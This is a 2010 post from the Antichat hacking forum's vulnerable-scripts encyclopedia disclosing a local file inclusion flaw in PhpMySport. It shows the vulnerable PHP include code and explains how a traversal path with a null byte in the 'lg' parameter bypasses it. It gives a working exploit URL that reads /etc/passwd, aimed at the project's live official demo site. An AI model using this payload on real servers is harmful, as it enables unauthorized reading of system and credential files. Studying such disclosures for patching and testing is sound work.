Форум АНТИЧАТ - Энциклопедия уязвимых скриптов

PhpMySport

#16

12.05.2010, 22:03

shell_c0de

Reservists Of Antichat - Level 6

Регистрация: 07.07.2009

Сообщений: 324

Провел на форуме:
1585404

Репутация: 564

Отправить сообщение для shell_c0de с помощью ICQ

Отправить сообщение для shell_c0de с помощью AIM

PhpMySport

PhpMySport
Site: phpmysport.sourceforge.net
Vulnerability: Local Files Include
Severity: High
Needs: magic_quotes=Off (or null-byte alternative)
Exploit: /index.php?lg=/../../../../../../../../../etc/passwd%00
Reason: В index.php есть строчки:

PHP код:


		
			
... 

/************************/ 

/* LANGUAGE MANAGEMENT  */ 

/************************/ 

if(!@include_once(create_path("include/lg_general_".LANG.".php"))) 

{ 

 echo "ERREUR : Language not supported/Langue non supportИe"; 

 exit(); 

} 

...

Константа LANG определяется в config.php и изначально берётся из get-параметра lg. Таким образом, мы можем написать слеш /, тем самым закрыв директорию, затем подняться вверх, расширение отрезать нулл-байтом.
Если не удаётся заинклудить, вылезает ошибка "ERREUR : Language not supported/Langue non supportИe". Вывод php-ошибок отключён.
Example: На официальном сайте http://phpmysport.sourceforge.net/demo/index.php?lg=/../../../../../../../../../etc/passwd%00&skin=defaut

Последний раз редактировалось shell_c0de; 12.05.2010 в 22:10..